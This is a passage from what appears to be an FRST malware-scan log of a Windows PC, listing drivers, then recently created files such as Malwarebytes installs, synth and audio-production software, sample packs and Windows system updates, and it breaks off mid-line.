[107496 2018-07-17] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices) R3 FocusriteUSB; C:\WINDOWS\System32\drivers\FocusriteUSB.sys [96400 2018-01-09] (Focusrite Audio Engineering Ltd. -> Focusrite Audio Engineering Ltd.) R3 FocusriteUSBAudio; C:\WINDOWS\system32\drivers\FocusriteUSBAudio.sys [54416 2018-01-09] (Focusrite Audio Engineering Ltd. -> Focusrite Audio Engineering Ltd.) R3 FocusriteUSBMidi; C:\WINDOWS\system32\drivers\FocusriteUSBMidi.sys [46224 2018-01-09] (Focusrite Audio Engineering Ltd. -> Focusrite Audio Engineering Ltd.) R3 FocusriteUSBSwRoot; C:\WINDOWS\System32\drivers\FocusriteUSBSwRoot.sys [97936 2018-01-09] (Focusrite Audio Engineering Ltd. -> Focusrite Audio Engineering Ltd.) S0 MbamElam; C:\WINDOWS\System32\DRIVERS\MbamElam.sys [20936 2019-02-01] (Microsoft Windows Early Launch Anti-malware Publisher -> Malwarebytes) R3 MBAMSwissArmy; C:\WINDOWS\System32\Drivers\mbamswissarmy.sys [275232 2019-06-09] (Malwarebytes Corporation -> Malwarebytes) R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [954368 2017-04-12] (Realtek Semiconductor Corp. -> Realtek ) R3 RtkBtFilter; C:\WINDOWS\system32\DRIVERS\RtkBtfilter.sys [715232 2017-05-20] (Realtek Semiconductor Corp. -> Realtek Semiconductor Corporation) R3 RTSUER; C:\WINDOWS\system32\Drivers\RtsUer.sys [418784 2016-10-27] (Realtek Semiconductor Corp. -> Realsil Semiconductor Corporation) R3 RTWlanE; C:\WINDOWS\system32\DRIVERS\rtwlane.sys [6813664 2017-05-19] (Realtek Semiconductor Corp. -> Realtek Semiconductor Corporation ) S3 ScpVBus; C:\WINDOWS\System32\drivers\ScpVBus.sys [44080 2016-09-27] (Shaul Eizikovich -> Nefarius Software Solutions) R3 tap-tb-0901; C:\WINDOWS\System32\drivers\tap-tb-0901.sys [38656 2018-07-31] (TunnelBear, Inc. -> The OpenVPN Project) R3 umbus; C:\WINDOWS\System32\drivers\umbus.sys [56832 2018-04-12] (Microsoft Windows -> Microsoft Corporation) S3 WdBoot; C:\WINDOWS\system32\drivers\wd\WdBoot.sys [46584 2018-09-16] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation) S3 WdFilter; C:\WINDOWS\system32\drivers\wd\WdFilter.sys [340008 2018-09-16] (Microsoft Windows -> Microsoft Corporation) S3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [61992 2018-09-16] (Microsoft Windows -> Microsoft Corporation) ==================== NetSvcs (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ==================== One month (created) ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2019-06-09 19:51 - 2019-06-09 19:53 - 000024274 _____ C:\Users\MYMLA\Downloads\FRST.txt 2019-06-09 19:51 - 2019-06-09 19:51 - 002418176 _____ (Farbar) C:\Users\MYMLA\Downloads\FRST64.exe 2019-06-09 19:51 - 2019-06-09 19:51 - 000000000 ____D C:\FRST 2019-06-09 19:47 - 2019-06-09 19:47 - 000275232 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamswissarmy.sys 2019-06-09 19:45 - 2019-06-09 19:46 - 000000000 ____D C:\AdwCleaner 2019-06-09 19:44 - 2019-06-09 19:45 - 007025360 _____ (Malwarebytes) C:\Users\MYMLA\Downloads\adwcleaner_7.3.exe 2019-06-09 19:28 - 2019-06-09 19:28 - 000000000 ____D C:\Users\MYMLA\AppData\Local\mbam 2019-06-09 19:27 - 2019-06-09 19:27 - 000001919 _____ C:\Users\Public\Desktop\Malwarebytes.lnk 2019-06-09 19:27 - 2019-06-09 19:27 - 000000000 ____D C:\Users\MYMLA\AppData\Local\mbamtray 2019-06-09 19:27 - 2019-06-09 19:27 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes 2019-06-09 19:27 - 2019-06-09 19:27 - 000000000 ____D C:\ProgramData\Malwarebytes 2019-06-09 19:27 - 2019-06-09 19:27 - 000000000 ____D C:\Program Files\Malwarebytes 2019-06-09 19:27 - 2019-02-01 12:20 - 000020936 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MbamElam.sys 2019-06-09 19:27 - 2019-01-08 16:32 - 000153328 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbae64.sys 2019-06-09 19:26 - 2019-06-09 19:27 - 063182216 _____ (Malwarebytes ) C:\Users\MYMLA\Downloads\mb3-setup-37469.37469-3.7.1.2839-1.0.586-1.0.10430.exe 2019-06-09 19:23 - 2019-06-09 19:40 - 000000000 __SHD C:\ProgramData\{DDF058D8-0F5A-412D-BDAF-9092C48AA545} 2019-06-09 14:59 - 2019-06-09 16:19 - 000000602 _____ C:\Users\MYMLA\Sawsubtr.csd 2019-06-05 20:24 - 2019-06-05 20:24 - 006626506 _____ C:\Users\MYMLA\Downloads\ToneZ_x64_1.2_Setup.zip 2019-06-05 20:13 - 2019-06-05 21:43 - 000000000 ____D C:\Users\MYMLA\Desktop\CabbagePresetTest 2019-06-04 18:41 - 2019-06-04 18:41 - 000005933 _____ C:\Users\MYMLA\AppData\Local\recently-used.xbel 2019-06-03 20:32 - 2019-06-03 20:37 - 063955387 _____ (Cabbage Audio ) C:\Users\MYMLA\Downloads\Cabbage64Setup (1).exe 2019-06-03 19:29 - 2019-06-03 19:31 - 000000852 _____ C:\Users\MYMLA\tessig.csd 2019-06-03 16:48 - 2019-06-03 16:48 - 029127185 _____ C:\Users\MYMLA\Documents\Synthart2.xcf 2019-06-03 11:35 - 2019-06-03 11:35 - 021411749 _____ C:\Users\MYMLA\Downloads\y2mate.com - _you_are_not_alone_1984_live_XOaglFya8ss_360p.mp4 2019-06-03 11:33 - 2019-06-03 11:33 - 022308621 _____ C:\Users\MYMLA\Downloads\y2mate.com - _1984_live_Cezd3oKFl_E_360p.mp4 2019-06-03 11:30 - 2019-06-03 11:31 - 065859063 _____ C:\Users\MYMLA\Downloads\y2mate.com - dancin_blue_HndZ4FF9XrM_720p.mp4 2019-06-03 11:29 - 2019-06-03 11:29 - 043861066 _____ C:\Users\MYMLA\Downloads\y2mate.com - flashin_night_good_bye_boogie_dance_3HQ-tZ00Xks_360p.mp4 2019-06-03 11:27 - 2019-06-03 11:28 - 013920527 _____ C:\Users\MYMLA\Downloads\y2mate.com - anri_cats_eye_1984avi_xOihMx9qeTw_360p.mp4 2019-06-03 10:41 - 2019-06-09 18:21 - 000000000 ____D C:\Users\MYMLA\AppData\LocalLow\BitTorrent 2019-06-02 17:31 - 2019-06-02 17:31 - 000000602 _____ C:\Users\MYMLA\test23.csd 2019-06-02 11:46 - 2019-06-02 11:46 - 013204273 _____ C:\Users\MYMLA\Documents\Synthart.xcf 2019-06-01 19:51 - 2019-06-01 19:51 - 000003426 _____ C:\Users\MYMLA\Downloads\kremlin.zip 2019-06-01 19:51 - 2019-06-01 19:51 - 000000000 ____D C:\Users\MYMLA\Downloads\kremlin 2019-06-01 12:56 - 2019-06-03 17:09 - 000000000 ____D C:\Users\MYMLA\Desktop\FMADD synth 2019-05-31 22:31 - 2019-05-31 22:31 - 000005110 _____ C:\Users\MYMLA\Fm2add.cabbage 2019-05-29 19:58 - 2019-05-29 20:04 - 000000000 ____D C:\Users\MYMLA\Downloads\Diginoiz - Magic 80s 2 2019-05-29 17:56 - 2019-06-01 12:10 - 000018095 _____ C:\Users\MYMLA\Fm2add.csd 2019-05-27 21:38 - 2019-05-27 21:38 - 000985152 _____ C:\Users\MYMLA\Downloads\Esquef2003_Article_Frequency-ZoomingARMAModelingF.pdf 2019-05-27 21:16 - 2019-05-27 21:16 - 001159095 _____ C:\Users\MYMLA\Downloads\DAFX02_Karjalainen_Valimaki_Esquef_bell-like_sounds.pdf 2019-05-27 19:13 - 2019-06-04 18:15 - 000000659 _____ C:\Users\MYMLA\test.csd 2019-05-26 15:52 - 2019-05-26 16:14 - 000000000 ____D C:\Users\MYMLA\Downloads\Zenhiser - 80's Synthwave Vol.2 2019-05-26 15:51 - 2019-05-26 17:39 - 000000000 ____D C:\Users\MYMLA\Downloads\80's Synthwave Vol. 1 - Zenhiser 2019-05-26 15:51 - 2019-05-26 15:51 - 000000000 ____D C:\Users\MYMLA\Downloads\Cymatics - Strangers Vintage Samples & Presets 2019-05-26 15:49 - 2019-05-26 17:03 - 000000000 ____D C:\Users\MYMLA\Downloads\Samplephonics - 80 s Drums 2019-05-26 15:49 - 2019-05-26 16:03 - 000000000 ____D C:\Users\MYMLA\Downloads\Samplephonics - 80's Synthwave 2019-05-26 15:48 - 2019-05-26 15:48 - 000000000 ____D C:\Users\MYMLA\Downloads\Zenhiser.Pure.80s.Hi.Hats.v1.WAV 2019-05-26 15:47 - 2019-05-26 17:50 - 000000000 ____D C:\Users\MYMLA\Downloads\Zenhiser.80s.Crush.WAV-MASCHiNE 2019-05-26 15:47 - 2019-05-26 15:47 - 000000000 ____D C:\Users\MYMLA\Downloads\SM101 - Massive 80s Sounds 2019-05-25 21:39 - 2019-05-25 21:39 - 000000000 ____D C:\Users\MYMLA\AppData\Local\CsoundQt-d-cs6 2019-05-22 20:17 - 2019-05-22 20:17 - 000584788 _____ C:\Users\MYMLA\Downloads\20.zip 2019-05-22 20:17 - 2019-05-22 20:17 - 000000000 ____D C:\Users\MYMLA\Downloads\20 2019-05-22 20:16 - 2019-05-22 20:16 - 000010773 _____ C:\Users\MYMLA\Downloads\porco-rosso-talk-about-our-old-days.mid 2019-05-20 20:09 - 2019-05-20 20:09 - 006086542 _____ ( ) C:\Users\MYMLA\Downloads\setup-kscript-editor-1.5.2.exe 2019-05-20 19:39 - 2019-05-20 19:39 - 000000000 ___HD C:\Users\MYMLA\Downloads\Family Nudism 2019-05-20 18:54 - 2019-05-27 19:49 - 000008318 _____ C:\Users\MYMLA\Desktop\Bell.csd 2019-05-20 17:10 - 2019-02-13 06:47 - 001909560 _____ (Microsoft Corporation) C:\WINDOWS\system32\mcupdate_GenuineIntel.dll 2019-05-19 11:49 - 2019-05-19 15:17 - 000000000 ____D C:\Users\MYMLA\Downloads\Shoko Sawada - Discography 2019-05-18 22:16 - 2019-05-18 22:16 - 000000000 ____D C:\Users\MYMLA\Downloads\Wavesfactory-Freelodica 2019-05-18 22:14 - 2019-05-18 22:15 - 093223105 _____ C:\Users\MYMLA\Downloads\Wavesfactory-Freelodica.rar 2019-05-18 21:21 - 2019-05-18 21:38 - 000023807 _____ C:\Users\MYMLA\Downloads\Whisky Wheel.knob 2019-05-18 21:17 - 2019-05-18 21:17 - 000099192 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll 2019-05-18 21:17 - 2019-05-18 21:17 - 000000000 ____D C:\Users\MYMLA\AppData\Roaming\Sun 2019-05-18 21:17 - 2019-05-18 21:17 - 000000000 ____D C:\Users\MYMLA\AppData\LocalLow\Sun 2019-05-18 21:17 - 2019-05-18 21:17 - 000000000 ____D C:\ProgramData\Oracle 2019-05-18 21:17 - 2019-05-18 21:17 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java 2019-05-18 21:17 - 2019-05-18 21:17 - 000000000 ____D C:\Program Files (x86)\Java 2019-05-18 21:16 - 2019-05-18 21:16 - 002043232 _____ (Oracle Corporation) C:\Users\MYMLA\Downloads\JavaSetup8u211.exe 2019-05-18 21:14 - 2019-05-18 21:38 - 000000000 ____D C:\Users\MYMLA\Downloads\JKnobMan133-exe 2019-05-18 21:13 - 2019-05-18 21:13 - 001989897 _____ C:\Users\MYMLA\Downloads\JKnobMan133-exe.zip 2019-05-18 19:39 - 2019-05-19 02:31 - 000000000 ____D C:\Users\MYMLA\Desktop\Sea Melodica 2019-05-17 20:03 - 2019-05-19 17:19 - 000000000 ____D C:\Users\MYMLA\Downloads\Lord of the Rings Trilogy BluRay Extended 1080p QEBS5 AAC51 PS3 MP4-FASM 2019-05-16 20:24 - 2019-05-18 10:32 - 000000000 ____D C:\Users\MYMLA\Downloads\Kontakt 6 NO INSTALL 2019-05-16 20:23 - 2019-05-16 20:26 - 000000000 ____D C:\Users\MYMLA\Downloads\Kontakt_604_UPDATE 2019-05-14 19:49 - 2019-05-03 13:14 - 000790208 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe 2019-05-14 19:49 - 2019-05-03 13:13 - 001376472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll 2019-05-14 19:49 - 2019-05-03 13:13 - 000396088 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll 2019-05-14 19:49 - 2019-05-03 12:55 - 000123392 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontsub.dll 2019-05-14 19:49 - 2019-05-03 12:54 - 000177664 _____ (Microsoft Corporation) C:\WINDOWS\system32\t2embed.dll 2019-05-14 19:49 - 2019-05-03 12:52 - 000119808 _____ (Microsoft Corporation) C:\WINDOWS\system32\wercplsupport.dll 2019-05-14 19:49 - 2019-05-03 12:51 - 003613696 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys 2019-05-14 19:49 - 2019-05-03 12:51 - 001364992 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvruserservice.dll 2019-05-14 19:49 - 2019-05-03 12:50 - 004054528 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll 2019-05-14 19:49 - 2019-05-03 12:50 - 001663488 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll 2019-05-14 19:49 - 2019-05-03 12:49 - 001288704 _____ (Microsoft Corporation) C:\WINDOWS\system32\werconcpl.dll 2019-05-14 19:49 - 2019-05-03 12:49 - 000488448 _____ (Microsoft Corporation) C:\WINDOWS\system32\werui.dll 2019-05-14 19:49 - 2019-05-03 12:49 - 000210944 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWWIN.EXE 2019-05-14 19:49 - 2019-05-03 12:43 - 001027008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll 2019-05-14 19:49 - 2019-05-03 12:43 - 000662328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe 2019-05-14 19:49 - 2019-05-03 12:30 - 000138752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\t2embed.dll 2019-05-14 19:49 - 2019-05-03 12:30 - 000098304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontsub.dll 2019-05-14 19:49 - 2019-05-03 12:28 - 002882048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys 2019-05-14 19:49 - 2019-05-03 12:28 - 000089600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll 2019-05-14 19:49 - 2019-05-03 12:27 - 000176640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWWIN.EXE 2019-05-14 19:49 - 2019-05-03 12:26 - 000425472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\werui.dll 2019-05-14 19:49 - 2019-05-03 12:25 - 004055040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll 2019-05-14 19:49 - 2019-05-03 12:25 - 001471488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll 2019-05-14 19:49 - 2019-05-03 07:43 - 000177128 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\intelpep.sys 2019-05-14 19:49 - 2019-05-03 07:36 - 001035256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ApplyTrustOffline.exe 2019-05-14 19:49 - 2019-05-03 07:34 - 000159864 _____ (Microsoft Corporation) C:\WINDOWS\system32\WerFaultSecure.exe 2019-05-14 19:49 - 2019-05-03 07:33 - 005625152 _____ (Microsoft Corporation) C:\WINDOWS\system32\StartTileData.dll 2019-05-14 19:49 - 2019-05-03 07:33 - 001219896 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe 2019-05-14 19:49 - 2019-05-03 07:33 - 001027384 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe 2019-05-14 19:49 - 2019-05-03 07:33 - 000709720 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys 2019-05-14 19:49 - 2019-05-03 07:33 - 000568104 _____ (Microsoft Corporation) C:\WINDOWS\system32\tcblaunch.exe 2019-05-14 19:49 - 2019-05-03 07:33 - 000134968 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.dll 2019-05-14 19:49 - 2019-05-03 07:33 - 000076088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hvservice.sys 2019-05-14 19:49 - 2019-05-03 07:33 - 000063072 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptdll.dll 2019-05-14 19:49 - 2019-05-03 07:32 - 000793640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys 2019-05-14 19:49 - 2019-05-03 07:32 - 000776784 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll 2019-05-14 19:49 - 2019-05-03 07:32 - 000493880 _____ (Microsoft Corporation) C:\WINDOWS\system32\WerFault.exe 2019-05-14 19:49 - 2019-05-03 07:32 - 000438984 _____ (Microsoft Corporation) C:\WINDOWS\system32\Faultrep.dll 2019-05-14 19:49 - 2019-05-03 07:32 - 000209208 _____ (Microsoft Corporation) C:\WINDOWS\system32\wermgr.exe 2019-05-14 19:49 - 2019-05-03 07:32 - 000170296 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecpkg.sys 2019-05-14 19:49 - 2019-05-03 07:32 - 000164664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wfplwfs.sys 2019-05-14 19:49 - 2019-05-03 07:31 - 009084432 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe 2019-05-14 19:49 - 2019-05-03 07:31 - 007519888 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll 2019-05-14 19:49 - 2019-05-03 07:31 - 007436536 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll 2019-05-14 19:49 - 2019-05-03 07:31 - 002811192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys 2019-05-14 19:49 - 2019-05-03 07:31 - 002771256 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll 2019-05-14 19:49 - 2019-05-03 07:31 - 001459328 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi 2019-05-14 19:49 - 2019-05-03 07:31 - 001260480 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe 2019-05-14 19:49 - 2019-05-03 07:31 - 001141224 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi 2019-05-14 19:49 - 2019-05-03 07:31 - 001098064 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvproc.dll 2019-05-14 19:49 - 2019-05-03 07:31 - 000983632 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe 2019-05-14 19:49 - 2019-05-03 07:31 - 000545808 _____ (Microsoft Corporation) C:\WINDOWS\system32\hal.dll 2019-05-14 19:49 - 2019-05-03 07:31 - 000412984 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys 2019-05-14 19:49 - 2019-05-03 07:31 - 000115728 _____ (Microsoft Corporation) C:\WINDOWS\system32\kdnet.dll 2019-05-14 19:49 - 2019-05-03 07:20 - 000434704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WerFault.exe 2019-05-14 19:49 - 2019-05-03 07:20 - 000384976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Faultrep.dll 2019-05-14 19:49 - 2019-05-03 07:20 - 000192016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wermgr.exe 2019-05-14 19:49 - 2019-05-03 07:20 - 000146920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WerFaultSecure.exe 2019-05-14 19:49 - 2019-05-03 07:19 - 006043712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll 2019-05-14 19:49 - 2019-05-03 07:19 - 000665224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll 2019-05-14 19:49 - 2019-05-03 07:19 - 000056288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptdll.dll 2019-05-14 19:49 - 2019-05-03 07:18 - 006569344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll 2019-05-14 19:49 - 2019-05-03 07:18 - 002258640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll 2019-05-14 19:49 - 2019-05-03 07:18 - 001130568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvproc.dll 2019-05-14 19:49 - 2019-05-03 07:12 - 025855488 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll 2019-05-14 19:49 - 2019-05-03 07:10 - 022017024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll 2019-05-14 19:49 - 2019-05-03 07:05 - 022716416 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll 2019-05-14 19:49 - 2019-05-03 07:02 - 019401216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll 2019-05-14 19:49 - 2019-05-03 07:02 - 004866048 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll 2019-05-14 19:49 - 2019-05-03 07:01 - 008189440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll 2019-05-14 19:49 - 2019-05-03 07:00 - 006661632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll 2019-05-14 19:49 - 2019-05-03 07:00 - 003400192 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll 2019-05-14 19:49 - 2019-05-03 07:00 - 000120832 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-kernel-processor-power-events.dll 2019-05-14 19:49 - 2019-05-03 07:00 - 000099328 _____ (Microsoft Corporation) C:\WINDOWS\system32\utcutil.dll 2019-05-14 19:49 - 2019-05-03 06:59 - 007593472 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll 2019-05-14 19:49 - 2019-05-03 06:59 - 005788672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll 2019-05-14 19:49 - 2019-05-03 06:59 - 003710976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll 2019-05-14 19:49 - 2019-05-03 06:59 - 001307648 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll 2019-05-14 19:49 - 2019-05-03 06:59 - 000514560 _____ (Microsoft Corporation) C:\WINDOWS\system32\nltest.exe 2019-05-14 19:49 - 2019-05-03 06:59 - 000209408 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXApplicabilityBlob.dll 2019-05-14 19:49 - 2019-05-03 06:59 - 000204288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wersvc.dll 2019-05-14 19:49 - 2019-05-03 06:59 - 000154112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll 2019-05-14 19:49 - 2019-05-03 06:58 - 002175488 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll 2019-05-14 19:49 - 2019-05-03 06:58 - 001708544 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSPhotography.dll 2019-05-14 19:49 - 2019-05-03 06:58 - 001361408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSPhotography.dll 2019-05-14 19:49 - 2019-05-03 06:58 - 000894464 _____ (Microsoft Corporation) C:\WINDOWS\system32\webplatstorageserver.dll 2019-05-14 19:49 - 2019-05-03 06:58 - 000726528 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll 2019-05-14 19:49 - 2019-05-03 06:58 - 000462336 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdedit.exe 2019-05-14 19:49 - 2019-05-03 06:58 - 000074240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dtdump.exe 2019-05-14 19:49 - 2019-05-03 06:57 - 001826816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.CloudStore.dll 2019-05-14 19:49 - 2019-05-03 06:57 - 001560576 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll 2019-05-14 19:49 - 2019-05-03 06:57 - 001549824 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll 2019-05-14 19:49 - 2019-05-03 06:57 - 001295872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll 2019-05-14 19:49 - 2019-05-03 06:57 - 000808448 _____ (Microsoft Corporation) C:\WINDOWS\system32\EdgeManager.dll 2019-05-14 19:49 - 2019-05-03 06:57 - 000608768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EdgeManager.dll 2019-05-14 19:49 - 2019-05-03 06:57 - 000561152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll 2019-05-14 19:49 - 2019-05-03 06:56 - 005350912 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll 2019-05-14 19:49 - 2019-05-03 06:56 - 001803776 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll 2019-05-14 19:49 - 2019-05-03 06:56 - 000773632 _____ (Microsoft Corporation) C:\WINDOWS\system32\netlogon.dll 2019-05-14 19:49 - 2019-05-03 06:56 - 000578560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll 2019-05-14 19:49 - 2019-05-03 06:56 - 000333824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgeIso.dll 2019-05-14 19:49 - 2019-05-03 06:55 - 003090432 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll 2019-05-14 19:49 - 2019-05-03 06:55 - 002166784 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys 2019-05-14 19:49 - 2019-05-03 06:55 - 000659968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netlogon.dll 2019-05-14 19:49 - 2019-05-03 06:54 - 004929024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll 2019-05-14 19:49 - 2019-05-03 06:54 - 001628672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll 2019-05-14 19:49 - 2019-05-03 06:54 - 001097728 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys 2019-05-14 19:49 - 2019-05-03 06:54 - 000961024 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll 2019-05-14 19:49 - 2019-05-03 06:54 - 000845824 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll 2019-05-14 19:49 - 2019-05-03 06:54 - 000778752 _____ (Microsoft Corporation) C:\WINDOWS\system32\BFE.DLL 2019-05-14 19:49 - 2019-05-03 06:54 - 000776192 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll 2019-05-14 19:49 - 2019-05-03 06:54 - 000669184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll 2019-05-14 19:49 - 2019-05-03 06:54 - 000667136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fveapi.dll 2019-05-14 19:49 - 2019-05-03 06:54 - 000543744 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll 2019-05-14 19:49 - 2019-05-03 06:54 - 000535552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll 2019-05-14 19:49 - 2019-05-03 06:54 - 000507392 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgeIso.dll 2019-05-14 19:49 - 2019-05-03 06:54 - 000251904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll 2019-05-14 19:49 - 2019-05-03 06:53 - 000204800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\intelppm.sys 2019-05-14 19:49 - 2019-05-03 06:53 - 000186880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\amdk8.sys 2019-05-14 19:49 - 2019-05-03 06:53 - 000184320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\amdppm.sys 2019-05-14 19:49 - 2019-05-03 06:53 - 000181760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\processr.sys 2019-05-14 19:49 - 2019-05-03 05:38 - 000001310 _____ C:\WINDOWS\system32\tcbres.wim 2019-05-14 19:49 - 2019-04-23 08:13 - 001008640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.MixedRealityCapture.dll 2019-05-14 19:49 - 2019-04-23 07:14 - 000868864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.MixedRealityCapture.dll 2019-05-14 19:49 - 2019-04-19 11:55 - 001634920 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll 2019-05-14 19:49 - 2019-04-19 11:54 - 000720200 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernel32.dll 2019-05-14 19:49 - 2019-04-19 11:40 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\system32\iemigplugin.dll 2019-05-14 19:49 - 2019-04-19 11:39 - 012754944 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll 2019-05-14 19:49 - 2019-04-19 11:38 - 000058368 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDSPnf.exe 2019-05-14 